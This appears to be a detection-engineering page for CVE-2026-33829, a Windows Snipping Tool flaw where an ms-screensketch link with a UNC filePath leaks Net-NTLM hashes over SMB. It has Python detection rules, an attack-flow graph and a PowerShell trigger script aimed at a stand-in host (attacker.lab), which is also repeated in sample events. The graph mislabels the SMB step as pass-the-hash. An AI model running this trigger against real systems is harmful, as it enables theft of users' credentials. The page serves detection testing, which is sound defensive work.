CVE-2026-33829: Snipping Tool NTLM Leak
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A vulnerability in the Windows Snipping Tool can expose Net-NTLM hashes from the currently logged-in user to a remote attacker. The issue is triggered through a malicious deep link that abuses the ms-screensketch URI scheme, causing Snipping Tool to open a file hosted on an attacker-controlled SMB share. Although the victim must click or open the crafted link, the credential leak itself happens silently in the background when Windows initiates the SMB connection. This behavior can give attackers access to NTLM challenge-response data without any visible warning to the user.
Investigation
Researchers found that the ms-screensketch protocol accepts a filePath parameter and does not properly restrict arbitrary UNC paths. When Snipping Tool attempts to access such a path, Windows automatically tries to authenticate to the remote SMB server, exposing the NTLM response in the process. To validate the issue, the researchers built proof-of-concept scripts that launched an SMB listener and generated a malicious URI capable of capturing the leaked hash.
Mitigation
Microsoft released a security update on April 14, 2026 to address the issue by removing the vulnerable deep link behavior from Snipping Tool. Applying this patch prevents the application from automatically opening attacker-supplied SMB paths through untrusted URIs. Organizations should prioritize deployment of the update across affected Windows systems to eliminate the exposure.
Response
Defenders should monitor for attempts to invoke the ms-screensketch URI scheme and watch for outbound SMB connections to unusual internal or external hosts. Systems that do not require Snipping Tool should have the protocol restricted where possible, and patch deployment should be enforced without delay. Any exposed NTLM hashes should be investigated promptly for signs of replay, relay, or other follow-on abuse.
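Detection logic for the two signals named above, as an added example that is not part of the original page: it runs two rules over constructed Sysmon-style events (Event ID 1 process creation and Event ID 3 network connection), flagging any command line that launches an ms-screensketch link with a UNC filePath, and the Snipping Tool binaries opening tcp/445 to a host outside an allowlist. The process image names, the allowlist entries and the sample paths are assumptions, not values from the page.

```python
import re

# Process images that host the ms-screensketch handler (names taken from the page's cleanup step).
SNIP_IMAGES = {"snippingtool.exe", "screensketch.exe"}
# Hypothetical allowlist of sanctioned SMB file servers; tune per environment.
ALLOWED_SMB_HOSTS = {"fileserver.corp.local", "10.0.0.5"}
# Captures the host of a UNC filePath argument inside an ms-screensketch deep link.
DEEPLINK_RE = re.compile(r"ms-screensketch:\S*filePath=\\\\([^\\\s\"'&]+)", re.IGNORECASE)

def image_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_process_create(ev):
    """Sysmon Event ID 1: a process launched with an ms-screensketch link whose filePath is a UNC path."""
    m = DEEPLINK_RE.search(ev.get("CommandLine", ""))
    if not m:
        return None
    return {"rule": "screensketch_unc_deeplink", "host": m.group(1).lower(), "image": ev.get("Image")}

def check_network_connect(ev, allowed=ALLOWED_SMB_HOSTS):
    """Sysmon Event ID 3: Snipping Tool opening SMB (tcp/445) to a host outside the allowlist."""
    if image_name(ev.get("Image", "")) not in SNIP_IMAGES or str(ev.get("DestinationPort")) != "445":
        return None
    dest = (ev.get("DestinationHostname") or ev.get("DestinationIp", "")).lower()
    if dest in allowed or ev.get("DestinationIp") in allowed:
        return None
    return {"rule": "snippingtool_smb_egress", "host": dest, "image": ev.get("Image")}

def detect(events, allowed=ALLOWED_SMB_HOSTS):
    """Run both rules over Sysmon-style event dicts and return the alerts raised, in event order."""
    alerts = []
    for ev in events:
        hit = None
        if ev.get("EventID") == 1:
            hit = check_process_create(ev)
        elif ev.get("EventID") == 3:
            hit = check_network_connect(ev, allowed)
        if hit:
            alerts.append(hit)
    return alerts

# Constructed sample telemetry (not real logs): one malicious launch and connection, two benign events.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Start-Process ms-screensketch:edit?filePath=\\attacker.lab\share\payload.png"},
    {"EventID": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"explorer.exe ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png"},
    {"EventID": 3, "Image": r"C:\Program Files\WindowsApps\SnippingTool\SnippingTool.exe",
     "DestinationHostname": "attacker.lab", "DestinationIp": "203.0.113.10", "DestinationPort": 445},
    {"EventID": 3, "Image": r"C:\Program Files\WindowsApps\SnippingTool\SnippingTool.exe",
     "DestinationHostname": "fileserver.corp.local", "DestinationIp": "10.0.0.5", "DestinationPort": 445},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

A local filePath or a connection to an allowlisted server raises nothing, so the rules fire only on the combination the page describes.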
Attack Flow
graph TB
  %% Class definitions
  classDef action fill:#99ccff
  classDef tool fill:#ffcc99
  classDef technique fill:#ccffcc
  %% Nodes
  action_user_click["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>User clicks a malicious link that triggers execution."]
  class action_user_click action
  tool_snipping["<b>Tool</b> – <b>Name</b>: Snipping Tool (ms-screensketch URI)<br/><b>Technique</b>: T1204 User Execution<br/><b>Description</b>: Launched via the ms-screensketch URI handler."]
  class tool_snipping tool
  tech_smb_conn["<b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool processes a filePath and initiates an SMB connection to an attacker-controlled server, enabling hash capture."]
  class tech_smb_conn technique
  tech_hash_capture["<b>Technique</b> – <b>Credential Access</b><br/>Attacker captures the Net-NTLM hash from the SMB authentication exchange."]
  class tech_hash_capture technique
  tech_lateral["<b>Technique</b> – <b>T1550.002 Pass the Hash</b><br/>Captured hash can be reused for lateral movement or privilege escalation."]
  class tech_lateral technique
  tech_c2_web["<b>Technique</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>Attacker may use HTTP/S web protocols for command and control communication."]
  class tech_c2_web technique
  tech_persistence["<b>Technique</b> – <b>T1574.006 Hijack Execution Flow: Dynamic Linker Hijacking</b><br/>Potential persistence through dynamic linker hijacking of the Snipping Tool process."]
  class tech_persistence technique
  %% Connections
  action_user_click -->|executes| tool_snipping
  tool_snipping -->|initiates SMB| tech_smb_conn
  tech_smb_conn -->|leads to| tech_hash_capture
  tech_hash_capture -->|enables| tech_lateral
  tech_hash_capture -->|enables| tech_c2_web
  tool_snipping -->|may lead to| tech_persistence
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands:
  An attacker has obtained a foothold on the victim workstation and wishes to harvest NTLM hashes without raising suspicion. Leveraging CVE-2026-33829, the attacker crafts a malicious ms-screensketch: URI that points to an attacker-controlled SMB share (\\attacker.lab\share\payload.png). When the Snipping Tool processes this URI, Windows automatically initiates an SMB connection to the remote server, leaking the machine's NTLM response. The attacker executes the URI via PowerShell to ensure the Snipping Tool is invoked in the user context.
- Regression Test Script:
  # NTLM Leak via Snipping Tool – trigger script
  # Adjust the UNC path to point to your controlled listener.
  $attackerServer = "attacker.lab"
  $sharePath = "share\payload.png"
  $uri = "ms-screensketch:edit?filePath=\\$attackerServer\$sharePath"
  Write-Host "Invoking Snipping Tool with malicious URI..."
  Start-Process $uri
  # Wait a few seconds for the SMB handshake to complete
  Start-Sleep -Seconds 5
  Write-Host "Invocation complete. Check SIEM for EventID 3 with DestinationHostname containing '$attackerServer'."
- Cleanup Commands:
  # Remove any residual Snipping Tool processes (if still running)
  Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force
  # Optional: delete temporary files created on the attacker side (if any)
  # (Assumes you have write access to the share)
  # Remove-Item -Path "\\$attackerServer\$sharePath" -Force